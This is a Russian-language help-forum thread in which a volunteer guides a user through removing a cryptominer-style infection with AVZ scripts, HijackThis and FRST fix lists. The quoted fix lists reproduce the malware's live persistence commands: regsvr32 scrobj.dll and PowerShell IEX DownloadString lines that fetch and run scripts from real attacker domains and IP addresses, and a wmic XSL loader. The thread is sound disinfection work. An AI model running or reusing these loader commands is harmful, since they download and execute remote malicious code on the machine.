ArCtic 0 Опубликовано 5 февраля, 2020 Share Опубликовано 5 февраля, 2020 Прогнал проверку с диска каспера, 1 вирус нашел - удалил, но все равно тупит комп, kaspersky free не хочет даже устанавливаться, все виснет CollectionLog-2020.02.05-14.27.zip Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 5 февраля, 2020 Share Опубликовано 5 февраля, 2020 Здравствуйте! Пролечите систему с помощью KVRT. Папку C:\KVRT_Data\Reports упакуйте в архив и прикрепите к следующему сообщению. После этого соберите свежий CollectionLog Автологером. Ссылка на сообщение Поделиться на другие сайты
ArCtic 0 Опубликовано 5 февраля, 2020 Автор Share Опубликовано 5 февраля, 2020 сделал CollectionLog-2020.02.05-15.06.zip Reports.rar Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 5 февраля, 2020 Share Опубликовано 5 февраля, 2020 Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО. Выполните скрипт в AVZ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\WINDOWS\mssecsvc.exe', ''); DeleteFile('C:\WINDOWS\mssecsvc.exe', '64'); DeleteService('mssecsvc2.0'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. Компьютер перезагрузится. Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KL-). Хотя, вероятно карантин будет пустой. "Пофиксите" в HijackThis: O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/02/04) O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O22 - Task: \AVAST Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe /from_scheduler:1 O22 - Task: avast! Emergency Update - C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe (file missing) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Прикрепите к следующему сообщению свежий CollectionLog. Ссылка на сообщение Поделиться на другие сайты
ArCtic 0 Опубликовано 5 февраля, 2020 Автор Share Опубликовано 5 февраля, 2020 пустой был CollectionLog-2020.02.05-16.22.zip Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 5 февраля, 2020 Share Опубликовано 5 февраля, 2020 пустой был Не страшно. Дополнительно: Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. Ссылка на сообщение Поделиться на другие сайты
ArCtic 0 Опубликовано 5 февраля, 2020 Автор Share Опубликовано 5 февраля, 2020 готово Новая папка.rar Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 5 февраля, 2020 Share Опубликовано 5 февраля, 2020 (изменено) Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CreateRestorePoint: (ssssssssss) [File not signed] C:\Windows\inf\aspnet\lsma12.exe C:\Windows\inf\aspnet\lsma12.exe HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION Task: {41F4E037-FF30-40A0-812A-B1644DC2CF29} - \ok -> No File <==== ATTENTION Task: {66BE674B-DC27-44F0-AB1E-E6992EC1A368} - \oka -> No File <==== ATTENTION Task: {6CD98BA5-20AF-432B-859F-B21C83523D1A} - \Mysa1 -> No File <==== ATTENTION Task: {870C2F1A-7C5E-44B0-BACE-1F60DAF9B7B6} - \Mysa2 -> No File <==== ATTENTION Task: {8A1FF6F1-E77A-4563-BCAB-A2E968E2D3C0} - \Mysa -> No File <==== ATTENTION Task: {B400F348-1E3F-4D71-8DC0-3E0A1A50614D} - \Mysa3 -> No File <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{5ce4092e-d517-4f47-a853-793a7cf73979} <==== ATTENTION (Restriction - IP) S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X] NETSVC: Ms5C47DF84App -> no filepath. File: C:\Windows\update.exe File: C:\Windows\system32\n1.dat File: C:\Windows\system32\n.dat ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":: WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99] WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate] EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. Изменено 5 февраля, 2020 пользователем Sandor Ссылка на сообщение Поделиться на другие сайты
ArCtic 0 Опубликовано 5 февраля, 2020 Автор Share Опубликовано 5 февраля, 2020 готово Fixlog.txt Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 5 февраля, 2020 Share Опубликовано 5 февраля, 2020 Файл C:\Windows\update.exeудалите вручную. Сообщите что с проблемой. Ссылка на сообщение Поделиться на другие сайты
ArCtic 0 Опубликовано 5 февраля, 2020 Автор Share Опубликовано 5 февраля, 2020 после перезагрузки установил kaspersky free, потом перезагрузил, в итоге проблема вернулась, касперского не оказалось и опять не устанавливается CollectionLog-2020.02.05-18.58.zip Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 5 февраля, 2020 Share Опубликовано 5 февраля, 2020 "Пофиксите" в HijackThis: O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl" Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО. Выполните скрипт в AVZ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe'); QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe', ''); QuarantineFileF('C:\Windows\inf\aspnet\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', ''); DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '64'); DeleteFileMask('C:\Windows\inf\aspnet\', '*', true); DeleteDirectory('C:\Windows\inf\aspnet\'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; RebootWindows(true); end. Компьютер перезагрузится. Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN). Повторите логи по правилам. Для еще одной повторной диагностики запустите снова Autologger. Прикрепите к следующему сообщению свежий CollectionLog. Ссылка на сообщение Поделиться на другие сайты
ArCtic 0 Опубликовано 7 февраля, 2020 Автор Share Опубликовано 7 февраля, 2020 В общем, переустановил ОС, с полным форматированием. Спасибо за помощь. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения